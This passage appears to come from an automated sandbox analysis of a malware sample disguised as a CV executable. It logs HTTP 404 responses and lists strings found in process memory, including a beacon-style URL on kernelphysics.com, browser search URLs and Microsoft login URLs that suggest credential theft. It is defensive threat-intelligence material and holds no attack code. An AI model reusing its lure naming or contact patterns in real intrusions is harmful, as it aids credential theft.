            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:34:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:34:38 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFfBmjngeefoQXmwhIwusgCfJraR3M1FEcCdHCY%2Bs1IxfHaFkXcmyw6o3YuwCh0hr6B2e1mOClgnTbI90mkg5mRJatLAIlE3hnIMP%2BDXHRbMeT3u%2Bv6QJJMiTZgQRMSXvkw%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a55a827f2ac33d-EWR
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:34:40 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w40qH%2BXGSRJfiJagOpcaw3Usw%2BBQTZ%2FMBbIIc3J11902iE8ey2YXzrrs4HDU5Fro%2BFq5yxiVNJqPsApT8o2kC9%2BqqxBI5E8XSdypPzK8Bt3a7DA2SNKkl9yghmXx4qpK15I%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a55a9249ca4234-EWR
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:34:43 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O84MJQ%2BCfOwHgoOw6VvBemqh7w0bDrwdaNPU%2BGnnQ1Ry2g55xtgUeLo4xfsOCR8xioY%2FDPewGnr7of2s46kOKXA%2FoQUR2O0GrSCvYMhyH4%2BkrfKBqpbL9GvCpW5kTl7oXSw%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a55aa29a62437b-EWR
            Content-Encoding: gzip
            alt-svc: h3=":443"; ma=86400
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:34:45 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxdo5ZR4k7ZWkEDIh8ot9bqD6ouRWQ%2B7n%2BUZ%2FTfGKZrTQ9gp8hqkopfUzCIqKZr8RM0SsawC8DEKtzBJw8e%2FAyQq1tJQcoe%2FUTr4lLxp0ktkAZ1l9T41aV03QKbW%2BcPqg0%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a55ab26a100f4b-EWR
            alt-svc: h3=":443"; ma=86400
            Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 27 May 2024 10:34:51 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 27 May 2024 10:34:55 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 27 May 2024 10:34:57 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            keep-alive: timeout=5, max=100
            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
            pragma: no-cache
            content-type: text/html
            content-length: 1251
            date: Mon, 27 May 2024 10:35:00 GMT
            server: LiteSpeed
            x-turbo-charged-by: LiteSpeed
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: 79a5c675-0b3b-4edd-85ca-0e1298f8c6ac
            x-runtime: 0.035627
            content-length: 18201
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: 431f0c0c-0669-4d9d-b651-95d48a5a0839
            x-runtime: 0.033628
            content-length: 18221
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            content-type: text/html; charset=UTF-8
            x-request-id: fb8f3bc5-976b-429d-b4db-f4281f33cc3c
            x-runtime: 0.029723
            content-length: 19233
            connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:36:15 GMT
            Server: Apache
            Content-Length: 514
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:36:17 GMT
            Server: Apache
            Content-Length: 514
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 27 May 2024 10:36:20 GMT
            Server: Apache
            Content-Length: 514
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:36:22 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:36:44 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/" | Server: Nginx_Rc-Cr | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:36:46 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/" | Server: Nginx_Rc-Cr | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 May 2024 10:36:49 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/" | Server: Nginx_Rc-Cr | Content-Encoding: br
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:36:57 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:37:00 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:37:04 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 27 May 2024 10:37:06 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: 1bdc198a-460a-4c1b-9118-0ce778869a37 | x-runtime: 0.040465 | content-length: 18203 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: f72fe0f9-86e2-472b-a04f-c43667e0c781 | x-runtime: 0.053112 | content-length: 18223 | connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: f2e0e0ec-15a0-4978-b37b-d5884e64b2a4 | x-runtime: 0.021172 | content-length: 19235 | connection: close
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006C2A000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000039EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1203989758.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shengniu.com
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shengniu.com/wy0r/
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006906000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000036C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033D
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: TSTheme.exe, 0000000F.00000003.1646446448.000000000830D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: TSTheme.exe, 0000000F.00000002.3664896761.00000000062BE000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006450000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.000000000307E000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003210000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
